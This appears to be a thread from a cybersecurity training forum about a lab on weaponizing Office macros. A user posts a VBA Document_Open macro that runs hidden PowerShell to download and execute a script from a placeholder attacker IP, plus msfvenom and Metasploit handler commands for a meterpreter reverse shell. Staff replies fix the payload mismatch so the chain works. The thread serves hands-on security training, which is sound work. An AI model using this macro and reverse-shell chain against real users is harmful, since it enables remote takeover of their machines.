Weaponization: Payloads – Office Macros

Question

I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes.

1. I've created a macro enabled word doc with the following vb code on windows machine:

Sub Document_Open()

Dim ps as String

ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')"

process = Shell(ps, vbhide)

End Sub

2. python3 -m http.server to start server to serve shell.ps1 on request

3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for

4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener

5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute.

What am I missing?

andradacraciun · Answer

Hi justajolt thanks for reaching out!&nbsp;We've checked the lab, and it's working correctly - looking at your progress, the payloads used for msfvenom and msfsconole need to match. At the minute, you are using windows/x64/meterpreter/reverse_tcp for msfvenom and windows/meterpreter/reverse_tcp for msfconole, when you should be using windows/x64/meterpreter/reverse_tcp for both. This should resolve the issue👍

kieranrowley · Answer

Hey justajolt - welcome to the community. Let me check with the lab author and see if I can get you a hint

Forum Discussion

Weaponization: Payloads – Office Macros

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Re: Hack to the Future: Early Careers in Cyber

Re: Introductions

Announcing the Winners of the 2024 Customer Awards!

Patch News Day, August 2024

Recent Discussions

Cannot seem to connect to Snaplabs via VPN

Operational Technology a Concern?

Introductions

The Human Connection Challenge: S1E1 Update

This Week in The Human Connection